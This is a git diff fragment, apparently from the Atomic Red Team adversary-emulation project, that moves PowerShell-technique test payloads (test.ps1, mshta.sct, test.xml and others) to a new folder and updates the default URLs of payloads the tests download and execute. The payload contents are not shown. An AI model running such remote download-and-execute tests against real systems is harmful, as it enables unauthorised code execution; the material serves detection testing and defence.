- windows
input_arguments:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -124,7 +167,7 @@ atomic_tests:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml
executor:
name: command_prompt
elevation_required: false
@@ -142,7 +185,7 @@ atomic_tests:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct
executor:
name: command_prompt
elevation_required: false
diff --git a/atomics/T1086/payloads/mshta.sct b/atomics/T1086/src/mshta.sct
similarity index 100%
rename from atomics/T1086/payloads/mshta.sct
rename to atomics/T1086/src/mshta.sct
diff --git a/atomics/T1086/payloads/test.ps1 b/atomics/T1086/src/test.ps1
similarity index 100%
rename from atomics/T1086/payloads/test.ps1
rename to atomics/T1086/src/test.ps1
diff --git a/atomics/T1086/payloads/test.sct b/atomics/T1086/src/test.sct
similarity index 100%
rename from atomics/T1086/payloads/test.sct
rename to atomics/T1086/src/test.sct
diff --git a/atomics/T1086/payloads/test.xml b/atomics/T1086/src/test.xml
similarity index 100%
rename from atomics/T1086/payloads/test.xml
rename to atomics/T1086/src/test.xml
diff --git a/atomics/T1086/payloads/test.xsl b/atomics/T1086/src/test.xsl
similarity index 100%
rename from atomics/T1086/payloads/test.xsl
rename to atomics/T1086/src/test.xsl